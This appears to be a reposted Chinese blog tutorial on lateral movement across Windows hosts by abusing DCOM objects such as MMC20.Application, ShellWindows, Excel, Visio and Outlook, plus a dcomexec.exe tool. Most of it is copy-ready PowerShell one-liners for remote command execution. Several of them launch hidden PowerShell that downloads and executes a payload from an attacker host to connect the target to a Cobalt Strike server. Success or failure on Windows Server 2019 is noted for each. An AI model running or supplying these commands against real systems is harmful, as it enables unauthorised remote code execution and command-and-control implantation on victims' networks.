DCOM遠程執行命令橫向移動

DCOM遠程執行命令橫向移動
- 一、DCOM介紹
- 二、獲取DCOM串列
- 三、DCOM橫向條件
- 四、MMC20.Application遠程執行命令
- 五、ShellWindows遠程執行命令
- 六、ShellBrowserWindow遠程執行命令
- 七、呼叫Excel.Application遠程執行命令
- 八、Visio.Application遠程執行命令
- 九、Outlook.Application遠程執行命令
- 十、dcomexec.exe遠程執行命令

一、DCOM介紹

DCOM（分布式組件物件模型）是微軟的一系列概念和程式介面，它支持不同的兩臺機器上的組件間的通信，不論它們是運行在局域網、廣域網、還是Internet上，利用這個介面，客戶端程式物件能夠向網路中另一臺計算機上的服務器程式物件發送請求，使用DCOM進行橫向移動的優勢之一在于，在遠程主機上執行的行程將會是托管COM服務器端的軟體，

二、獲取DCOM串列

Get-CimInstance Win32_DCOMApplication
Get-CimInstance -classWin32_DCOMApplication | select appid,name
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

三、DCOM橫向條件

1、必須擁有管理員權限

2、在遠程主機上執行命令時，必須使用域管的administrator賬戶或者目標主機具有管理員權限的賬戶，而且密碼要相同

四、MMC20.Application遠程執行命令

1、打開被控機的計算器（win-server-2019復現成功）

powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed")

2、遠程上線CS（win-server-2019復現成功）

powershell [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.142.10")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))","Minimzed")

五、ShellWindows遠程執行命令

1、打開被控機的計算器（win-server-2019復現成功）

powershell [Activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"127.0.0.1")).item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

2、打開域控的計算器（win-server-2019復現失敗）

powershell [Activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.142.10")).item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

3、遠程上線CS（win-server-2019復現失敗）

powershell [Activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.142.10")).item().Document.Application.ShellExecute("cmd.exe","/c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))","c:windowssystem32",$null,0)

六、ShellBrowserWindow遠程執行命令

適用于Windows 10和Windows Server 2012 R2等版本的系統，

1、打開被控機的計算器（win-server-2019復現成功）

powershell [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","127.0.0.1")).Document.Application.shellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

2、打開域控的計算器（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.142.10")).Document.Application.shellExecute("cmd.exe","/c calc.exe","c:windowssystem32",$null,0)

3、遠程上線CS（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.142.10")).Document.Application.shellExecute("cmd.exe","/c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))","c:windowssystem32",$null,0)

七、呼叫Excel.Application遠程執行命令

目標主機中安裝有excle

1、打開被控機的計算器（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromprogID("Excel.Application","127.0.0.1")).DDEInitiate("cmd.exe","/c calc.exe")

2、打開域控的計算器（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromprogID("Excel.Application","192.168.142.10")).DDEInitiate("cmd.exe","/c calc.exe")

3、遠程上線CS（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromprogID("Excel.Application","192.168.142.10")).DDEInitiate("cmd.exe","/c powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))")

八、Visio.Application遠程執行命令

目標主機中安裝有Visio

1、打開被控機的惡意檔案（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.Application","127.0.0.1")).[0].Document.Application.shellExecute("C:can.exe")

2、遠程上線CS（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.Application","192.168.142.10")).[0].Document.Application.shellExecute("C:can.exe")

九、Outlook.Application遠程執行命令

目標主機中安裝有Outlook

1、打開被控機的惡意檔案（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.Application","127.0.0.1")).createObject("Shell.Application").shellExecute("C:can.exe")

2、遠程上線CS（win-server-2019復現失敗）

powershell [activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.Application","192.168.142.10")).createObject("Shell.Application").shellExecute("C:can.exe")

十、dcomexec.exe遠程執行命令

1、遠程執行命令（win-server-2019復現失敗，rpc_s_access_denied）

shell dcomexec.exe administrator:admin@[email protected] whoami

2、遠程上線CS（win-server-2019復現失敗，rpc_s_access_denied）

shell dcomexec.exe administrator:admin@[email protected] cmd.exe /c "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.142.1/payload.ps1'))"

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/555106.html

標籤：其他

上一篇：ChatGPT在工業領域的研究與應用探索-AI助手實驗應用

下一篇：返回列表